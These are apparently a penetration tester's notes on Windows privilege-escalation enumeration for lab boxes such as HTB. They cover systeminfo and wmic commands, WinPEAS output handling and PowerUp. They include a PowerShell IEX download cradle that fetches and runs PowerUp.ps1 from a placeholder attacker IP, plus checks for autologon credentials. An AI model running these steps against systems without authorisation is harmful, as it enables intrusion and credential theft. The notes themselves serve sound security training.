Enumeration

Manual Enumeration

Get OS version:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Get service pack version:

wmic os get servicepackmajorversion

Automatic Enumeration

WinPEAS

Great Windows privesc enumeration script.

PEASS-ng/winPEAS at master · peass-ng/PEASS-ngGitHub

If you transfer the results from running the script to linux, then you can view colourized output with the cat command. Vim doesn't colourize it properly.

To view it with other tools, you have to convert it to UTF-8 first.

iconv -f utf-16le -t utf-8 winpeas.txt -o winpeas-utf-8.txt

After that, you can view it with less (ansi coloured output).

less -R winpeas-utf-8.txt

Caveats:

• When I tested this script, it wasn't able to find autologon credentials, even though PowerUp was able to find them with Get-RegistryAutoLogon (WinPEAS checks for them but said it didn't find any in the "Bart" box on HTB)

PowerUp

This may catch some stuff that WinPEAS might not find, like autologon credentials.

Serve the script over HTTP:

python3 -m http.server 80

(From Powershell) load the module into memory:

IEX (New-Object Net.WebClient).DownloadString('http://YOUR_IP_ADDRESS_HERE/PowerUp.ps1');

Invoke all checks:

Invoke-AllChecks | Out-File -Encoding ASCII powerup.txt

Caveats:

• If you're running the script on a 64-bit machine, then make sure you're using 64-bit Powershell.